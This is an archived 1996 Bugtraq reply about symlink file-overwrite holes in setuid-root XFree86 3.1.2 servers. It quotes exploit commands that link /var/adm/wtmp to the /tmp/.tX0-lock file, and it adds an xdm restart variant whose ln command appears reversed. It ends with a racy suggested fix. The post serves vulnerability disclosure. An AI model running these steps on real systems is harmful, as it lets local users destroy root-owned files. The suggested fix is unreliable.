Re: XFree86 3.1.2 Security Problems
Anthony C. Zboralski (frantic@worldnet.net)
Tue, 30 Jan 1996 02:51:40 +0100
-----BEGIN PGP SIGNED MESSAGE-----
On Mon, 29 Jan 1996, David J Meltzer wrote:
> Date: Mon, 29 Jan 1996 00:16:46 -0500
> From: David J Meltzer <davem+@andrew.cmu.edu>
> To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
> Subject: XFree86 3.1.2 Security Problems
>
> There are security holes in XFree86 3.1.2, which installs its servers
> as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files,
> it does not take proper precautions to ensure that file permissions are
> maintained, resulting in the ability to overwrite files, and to read
> limited portions of other files.
> The first problem stems from the server opening a temporary file,
> /tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this
> file a symlink, the server will overwrite the original file, and then
> write to it its current pid.
> Other problems exist in the server relating to similar problems, one
> such example is the ability to specify an arbitrary file for the XF86config
> file which will then be opened, and the first line that fails to match
> the expected format will be output with an error, allowing a line to be
> read from an arbitrary file.
>
> Program: XFree86 3.1.2 servers
> Affected Operating Systems: All systems with XFree86 3.1.2 installed
> Requirements: account on system
> Temporary Patch: chmod o-x /usr/X11R6/bin/XF86*
> Security Compromise: overwrite arbitrary files
> Author: Dave M. (davem@cmu.edu)
> Synopsis: While running suid root, XFree86 servers do
> not properly check file permissions, allowing
> a user to overwrite arbitrary files on a
> system.
>
>
> Exploit:
> $ ls -l /var/adm/wtmp
> -rw-r--r-- 1 root root 174104 Dec 30 08:31 /var/adm/wtmp
> $ ln -s /var/adm/wtmp /tmp/.tX0-lock
> $ startx
> (At this point exit X if it started, or else ignore any error messages)
> $ ls -l /var/adm/wtmp
> -r--r--r-- 1 root root 11 Dec 30 08:33 /var/adm/wtmp
>
>
Oh well if xdm is running.. The temporary patch won't do you good...
Xdm manages a collection of X displays, which may be on the local host
or remote servers. Xdm provides services similar to those provided by
init, getty and login on character terminals: prompting for login
name and password, authenticating the user, and running a ``session.''
Xdm is launched by root.. by default it will start a server on the local
display. If the server crashes for some reason, gets killed or if the user
sends a server abort sequence, it will restart the server..
$ps -ax |grep xdm
80 ? S 0:00 xdm
142 ? S 0:01 /usr/X11R6/bin/X -auth /usr/X11R6/lib/X11/xdm/A:0-a00080
179 v03 D 0:00 grep xdm
$ls -l /var/log/wtmp
- -rw-r--r-- 1 root root 31864 Jan 30 02:13 /var/log/wtmp
$ ln -s /tmp/.tX0-lock /var/log/wtmp
Now, you switch to the local X display and
send the <Crtl><Alt><BS> server abort sequence..
Wait until xdm pops up a new server process..
than switch back to shell:
$ls -l /var/log/wtmp
- -rw-r--r-- 1 root root 11 Jan 30 02:13 /var/log/wtmp
Xdm doesn't need to kill the server when a user logs out so the only worry
would be the sending of the abort sequence easily fixed by uncommenting in
the "Don'tZap" setting in /etc/XF86Config.. but I have seen XF86 crashing
so many times for unguessable reason so i don't think it will fix the prob.
Maybe someone could take a look at the server sources so it does a
system("/bin/rm /tmp/.tX0-lock") just before it a write to the file..
I don't have 'em handy..
____
\ /__ Anthony C. Zboralski <frantic@worldnet.net>
\/ /
\/ Finger <frantic@webbar.imaginet.fr> for PGP Public Key
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: France, Russia and Irak still forbid encryption..
iQCVAwUBMQ141V/59mQ4I551AQGVEgP/aO3+dCX8FA/2sNOeaE6p33u2+Ed1yuPM
2NyI14L3q1RQ7xt8seHQD1KzWxvRJxbSvWKhrIdhSuisAzlh8QJdn4hZ8ulgPNBf
uesUvAbvVJjhhandT0wjVbL0rYRBJEs9NJtWTrrF/gZ+5+cuvnKM2iyeTcAY9EGL
2MvbAtN6yr4=
=EwzG
-----END PGP SIGNATURE-----